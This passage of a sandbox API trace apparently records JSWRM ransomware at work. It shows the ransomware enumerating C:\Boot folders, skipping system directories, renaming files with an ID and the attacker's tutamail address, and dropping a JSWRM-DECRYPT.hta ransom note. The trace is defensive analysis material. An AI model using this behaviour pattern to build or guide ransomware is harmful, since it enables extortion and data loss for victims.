(HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225bb0 | out: hHeap=0x1e0000) returned 1 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.032] MoveFileW (lpExistingFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.032] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cd3407f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cd3407f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cd3407f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.032] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.033] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.033] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.034] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.034] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.034] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.034] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.034] CloseHandle (hObject=0xffffffff) returned 1 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0064.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0064.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0064.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.034] MoveFileW (lpExistingFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\nb-NO\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.035] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.035] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.035] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2=".") returned 1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="..") returned 1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="...") returned 1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="windows") returned -1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="recovery") returned -1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="perflogs") returned -1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="documents and settings") returned 1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="$RECYCLE.BIN") returned 1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="system volume information") returned -1 [0064.035] lstrcmpiW (lpString1="nl-NL", lpString2="msocache") returned 1 [0064.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.035] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\nl-nl\\jswrm-decrypt.hta")) returned 0xffffffff [0064.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0064.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0064.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.036] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\nl-nl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.036] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.036] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.061] CloseHandle (hObject=0x450) returned 1 [0064.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0064.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0064.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.062] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\nl-nl\\jswrm-decrypt.hta")) returned 0x20 [0064.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.062] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cd3407f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0064.062] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.062] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cd3407f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.063] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.063] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.063] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.063] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.063] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.064] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561371328) returned 0 [0064.064] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.065] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.065] CloseHandle (hObject=0xffffffff) returned 1 [0064.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: 